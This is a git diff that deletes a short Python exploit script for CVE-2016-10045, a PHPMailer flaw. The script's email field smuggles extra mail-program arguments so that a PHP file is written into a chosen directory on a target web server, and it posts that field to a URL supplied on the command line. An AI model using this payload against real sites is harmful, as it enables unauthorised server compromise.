diff --git a/exploits/CVE-2016-10045.py b/exploits/CVE-2016-10045.py deleted file mode 100755 index c970bfc..0000000 --- a/exploits/CVE-2016-10045.py +++ /dev/null @@ -1,31 +0,0 @@ -import requests -import argparse -import re - -def exploit(target_url, directory_path): - if not re.match(r'^https?://', target_url): - target_url = f"https://{target_url}" - - payload = "\"attacker\\' -oQ/tmp/ -X%s/phpcode.php some\"@email.com" % directory_path - payload_code = "" - - request_payload = {'action': 'send', 'name': 'LESIS', 'email': payload, 'msg': payload_code} - - response = requests.post(target_url, data=request_payload) - - if response.status_code == 200: - print("Exploitation successful!") - if response.status_code != 200: - print("Exploitation failed.") - -def main(): - parser = argparse.ArgumentParser(description='CVE-2016-10045 | PHPMailer') - parser.add_argument('-t', '--target', required=True, help='Target URL') - parser.add_argument('-d', '--dir', required=True, help='Remote recording directory') - args = parser.parse_args() - - if args.target and args.dir: - exploit(args.target, args.dir) - -if __name__ == '__main__': - main()